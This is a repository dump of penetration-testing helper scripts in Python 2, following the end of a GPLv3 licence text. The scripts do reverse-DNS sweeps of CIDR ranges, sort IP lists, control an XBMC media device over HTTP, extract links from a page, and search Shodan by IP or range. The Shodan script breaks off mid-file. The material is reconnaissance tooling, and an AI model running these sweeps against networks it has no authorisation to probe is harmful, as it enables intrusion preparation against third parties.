180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 
216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 
246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. 
If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 
309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 
336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 
360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. 
If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 
428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. 
If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 
486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 
512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. 
If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 
578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 
613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | {one line to give the program's name and a brief idea of what it does.} 635 | Copyright (C) {year} {name of author} 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see {http://www.gnu.org/licenses/}. 649 | 650 | Also add information on how to contact you by electronic and paper mail. 
651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | PenTestScripts Copyright (C) 2013 ChrisTruncer 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | {http://www.gnu.org/licenses/}. 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | {http://www.gnu.org/philosophy/why-not-lgpl.html}. 675 | -------------------------------------------------------------------------------- /NetworkScripts/DNSReverser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Quick script that attempts to find the reverse DNS info 4 | # from a provided IP range. 
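import argparse
import os
import socket
import sys
from netaddr import IPNetwork


def cli_parser():
    """Parse the command line and return the (file, ip, cidr) options.

    Each of the three values is None when its option was not given. Help is
    handled by hand because add_help is disabled: any of the help flags
    prints the usage text and exits.
    """

    # Command line argument parser
    parser = argparse.ArgumentParser(
        add_help=False,
        description="DNSReverser takes IP addresses and tries to find its hostname.")
    parser.add_argument(
        "-f", metavar="ips.txt", default=None,
        help="File containing IPs to resolve hostnames for.")
    parser.add_argument(
        "-ip", metavar='192.168.1.1', default=None,
        help="Used to find hostname about a specific IP.")
    parser.add_argument(
        "-cidr", metavar='192.168.1.0/24', default=None,
        help="Used to find hostnames about a specific CIDR range.")
    parser.add_argument(
        '-h', '-?', '--h', '-help', '--help', action="store_true",
        help=argparse.SUPPRESS)
    args = parser.parse_args()

    if args.h:
        parser.print_help()
        sys.exit()

    return args.f, args.ip, args.cidr


def rdns_lookup(ip_address):
    """Resolve one address to a hostname and append the pair to the results file.

    A successful lookup appends "<ip> <hostname>" as one line to
    reverse_dns_results.txt in the current directory. A failed lookup is
    reported on stdout and nothing is written.
    """

    try:
        # Get the reverse dns name if it exists
        reverse_dns = socket.gethostbyaddr(ip_address)[0]
    except socket.error:
        # herror and gaierror both derive from socket.error. Catching only
        # these, rather than everything, lets Ctrl-C abort a long range scan
        # and keeps unrelated failures from being reported as a missing record.
        print "No Reverse DNS for " + str(ip_address) + "."
        return

    # The hostname comes from a PTR record, which is controlled by whoever
    # runs DNS for that address space; treat the results file as untrusted
    # input when it is fed to other tools.
    script_out = ip_address.strip() + ' ' + reverse_dns + '\n'
    try:
        with open('reverse_dns_results.txt', 'a') as rev_results:
            rev_results.write(script_out)
    except IOError as err:
        # A write failure is a different problem from a failed lookup, so it
        # gets its own message.
        print "[*]ERROR: Could not write reverse_dns_results.txt: " + str(err)

    return


def cidr_net(cidr_range):
    """Return the netaddr IPNetwork built from cidr_range.

    The caller iterates the result to visit each address in the range.
    """
    net_1 = IPNetwork(cidr_range)

    return net_1


def file_read(input_file):
    """Return the lines of input_file as a list, line endings included."""
    with open(input_file, 'r') as f:
        ip_file = f.readlines()

    return ip_file


def title():
    """Clear the terminal and print the scan banner."""
    # Clear the screen
    os.system('clear')

    print "############################################################"
    print "# Reverse DNS Scanner #"
    print "############################################################\n"
    print "Starting Reverse DNS Scan...\n"

    return


if __name__ == '__main__':

    # Parse command line options
    cli_file, cli_ip, cli_cidr = cli_parser()

    title()

    # Exactly one of -cidr, -f and -ip may be given
    if cli_cidr is not None and cli_file is None and cli_ip is None:
        ip_cidr_list = cidr_net(cli_cidr)
        for ip_add in ip_cidr_list:
            ip_add = str(ip_add)
            ip_add = ip_add.strip()
            rdns_lookup(ip_add)

    elif cli_file is not None and cli_cidr is None and cli_ip is None:
        ip_file_input = file_read(cli_file)
        for ip_add_file in ip_file_input:
            ip_add_file = ip_add_file.strip()
            # Blank lines in the input file are not addresses; skip them
            if not ip_add_file:
                continue
            rdns_lookup(ip_add_file)

    elif cli_ip is not None and cli_cidr is None and cli_file is None:
        rdns_lookup(cli_ip)

    else:
        print "[*]ERROR: Please start over and provide a valid input option."
        sys.exit()

    print "\nScan Completed! Check the output file!\n"

--------------------------------------------------------------------------------
/NetworkScripts/IPSorter.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# IP sort and uniquing script by @ChrisTruncer

import os
import sys


def _octets(address):
    """Return address as a tuple of four ints, or None if it is not a dotted quad."""
    fields = address.split(".")
    if len(fields) != 4 or not all(field.isdigit() for field in fields):
        return None
    return tuple(int(field) for field in fields)


try:
    # Take filename as first argument
    ip_file = sys.argv[1]
except IndexError:
    # Clear the console
    os.system('clear')
    print "#####################################################################"
    print "# IP Sorter #"
    print "#####################################################################\n"
    # Written as one literal so the text does not depend on a backslash
    # continuation followed by a whitespace-stripping replace()
    print ("[*] ERROR: Please provide a file containing IPs to be uniqued "
           "and sorted!\n")
    print "Example: ./IPSorter.py ips.txt"
    sys.exit()

# Read in all IPs from user specified file. Lines are stripped before they
# are de-duplicated, so a trailing newline, CRLF or padding cannot make two
# copies of the same address look different.
with open(ip_file, 'r') as open_file:
    ips = set(line.strip() for line in open_file)

# Sort on integer octets. Padding the octets as text while the newline is
# still attached to the last one mis-orders it (x.x.x.100 sorts before
# x.x.x.20).
sortable = []
for address in ips:
    if not address:
        continue
    key = _octets(address)
    if key is None:
        # A malformed line is reported and skipped instead of aborting the
        # whole run with a format-string error
        sys.stderr.write("[*] Skipping non-IPv4 line: " + address + "\n")
        continue
    sortable.append((key, address))

for _key, address in sorted(sortable):
    print address

--------------------------------------------------------------------------------
/NetworkScripts/xbmc.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

# This script implements basic controls for a Boxee xbmc device
# Play both pauses and plays a video.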
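# Everything else should be straightforward

import argparse
import sys
import urllib2


# Request path sent to the device for each accepted command name
XBMC_COMMANDS = {
    "play": '/xbmcCmds/xbmcHttp?command=Pause()',
    "pause": '/xbmcCmds/xbmcHttp?command=Pause()',
    "stop": '/xbmcCmds/xbmcHttp?command=Stop()',
    "ok": '/xbmcCmds/xbmcHttp?command=SendKey(0XF00D)',
    "enter": '/xbmcCmds/xbmcHttp?command=SendKey(0XF00D)',
    "right": '/xbmcCmds/xbmcHttp?command=SendKey(0XF027)',
    "left": '/xbmcCmds/xbmcHttp?command=SendKey(0XF025)',
    "down": '/xbmcCmds/xbmcHttp?command=SendKey(0XF028)',
    "up": '/xbmcCmds/xbmcHttp?command=SendKey(0XF026)',
    "rewind": '/xbmcCmds/xbmcHttp?command=Action(78)',
    "fastforward": '/xbmcCmds/xbmcHttp?command=Action(77)',
}


def cli_parser():
    """Parse the command line and return the argparse namespace.

    The namespace carries ip, port, command and h. Only port has a default
    ('8800'); ip and command are None when omitted. Any of the help flags
    prints the usage text and exits.
    """

    # Command line argument parser
    parser = argparse.ArgumentParser(
        add_help=False,
        description="Boxee_Control is a script that lets you control Boxee and XBMC devides. Supported commands are Play/Pause, OK/Enter, Stop, Left, Right, Down, Up.")
    parser.add_argument(
        "--ip", metavar='192.168.199.23',
        help="IP address of boxee/xbmc device.")
    parser.add_argument(
        "--port", metavar='8800', default='8800',
        help="Specify port value, default is 8800.")
    parser.add_argument(
        "--command", '-c', metavar="Play",
        help="Command to issue. Supported Commands: Play, Pause, Stop, Left, Right, Down, Up, Ok, Enter, Rewind, Fastforward.")
    parser.add_argument(
        '-h', '-?', '--h', '-help', '--help', action="store_true",
        help=argparse.SUPPRESS)
    args = parser.parse_args()

    if args.h:
        parser.print_help()
        sys.exit()

    return args

if __name__ == '__main__':

    # Begin parsing command line options
    cli_args = cli_parser()

    # --ip and --command have no defaults; without this guard a missing
    # option ends in a traceback on None instead of a usage message.
    if cli_args.ip is None or cli_args.command is None:
        print "[*]ERROR: Please provide both --ip and --command."
        sys.exit()

    # The request is plain HTTP and carries no credentials, so anyone on the
    # path between this host and the device can read or replay it.
    xbmc_system = "http://" + cli_args.ip + ":" + cli_args.port

    # Normalise once so every command tolerates case and stray whitespace,
    # not only play/pause
    requested = cli_args.command.lower().strip()
    xbmc_command = XBMC_COMMANDS.get(requested)
    if xbmc_command is None:
        print "You didn't specify a supported command. Please only use:"
        print "play, pause, stop, ok, enter, up, down, left, right, rewind, or fastforward"
        sys.exit()

    full_url = xbmc_system + xbmc_command

    # Send the command; the timeout keeps an unreachable device from hanging
    # the script indefinitely
    response = urllib2.urlopen(full_url, timeout=10)
    response.close()

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
PenTestScripts
==============

Scripts that are useful for me on pen tests

--------------------------------------------------------------------------------
/WebScripts/LinkFinder.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

import httplib2
from BeautifulSoup import BeautifulSoup, SoupStrainer

# Fetch one fixed page
http = httplib2.Http()
status, response = http.request('http://www.christophertruncer.com')

# Parse only the anchor tags and print the href of each one that has it
for link in BeautifulSoup(response, parseOnlyThese=SoupStrainer('a')):
    if link.has_key('href'):
        print link['href']

--------------------------------------------------------------------------------
/WebScripts/ShodanSearch.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

# Script for interacting with Shodan's API and searching it.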
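# In case you get an import error for netaddr or shodan, run:
# apt-get install python-shodan python-netaddr

import argparse
from netaddr import IPNetwork
import os
import re
import shodan
import sys

# Both patterns came from (Mult-line link for pep8 compliance)
# http://python-iptools.googlecode.com/svn-history/r4
# /trunk/iptools/__init__.py
_CIDR_RE = re.compile(r'^(\d{1,3}\.){0,3}\d{1,3}/\d{1,2}$')
_IP_RE = re.compile(r'^(\d{1,3}\.){0,3}\d{1,3}$')


def cli_parser():
    """Parse the command line.

    Returns the tuple (search, ip, cidr, hostnameonly, page, f).  search,
    ip and cidr are False when not supplied, f is None when not supplied.
    """
    # Command line argument parser
    parser = argparse.ArgumentParser(
        add_help=False,
        description="ShodanSearch is a tool for searching shodan via its API.")
    parser.add_argument(
        "-search", metavar="Apache server", default=False,
        help="Use this when searching Shodan for a string.")
    parser.add_argument(
        "-f", metavar="ips.txt", default=None,
        help="File containing IPs to search shodan for.")
    parser.add_argument(
        "-ip", metavar='192.168.1.1', default=False,
        help="Used to return results from Shodan about a specific IP.")
    parser.add_argument(
        "-cidr", metavar='192.168.1.0/24', default=False,
        help="Used to return results from Shodan about a specific CIDR range.")
    parser.add_argument(
        "--hostnameonly", action='store_true',
        help="[Optional] Only provide results with a Shodan stored hostname.")
    # type=int so a page given on the command line has the same type as
    # the default and a non-numeric value is rejected by argparse
    parser.add_argument(
        "--page", metavar='1', default=1, type=int,
        help="Page number of results to return (default 1 (first page)).")
    parser.add_argument(
        '-h', '-?', '--h', '-help', '--help', action="store_true",
        help=argparse.SUPPRESS)
    args = parser.parse_args()

    if args.h:
        parser.print_help()
        sys.exit()

    return args.search, args.ip, args.cidr, args.hostnameonly, args.page, args.f


def create_shodan_object():
    """Return a shodan.WebAPI client built from the configured API key.

    The key is read from the SHODAN_API_KEY environment variable when it
    is set, so a real key does not have to be written into this file and
    cannot be committed along with it.  Otherwise the in-file value is used.
    """
    # Add your shodan API key here, or export SHODAN_API_KEY instead
    api_key = os.environ.get("SHODAN_API_KEY", "TYPEAPIKEYHERE")

    return shodan.WebAPI(api_key)


def _print_host_result(result):
    """Print the fields of a host() lookup result that this script reports."""
    print("\n*** RESULT ***")
    print("IP: " + result['ip'])
    print("Country: " + result['country_name'])
    if result['city'] is not None:
        print("City: " + result['city'])
    print("\n")

    # Loop through other info
    # NOTE(review): banner text presumably originates from the remote
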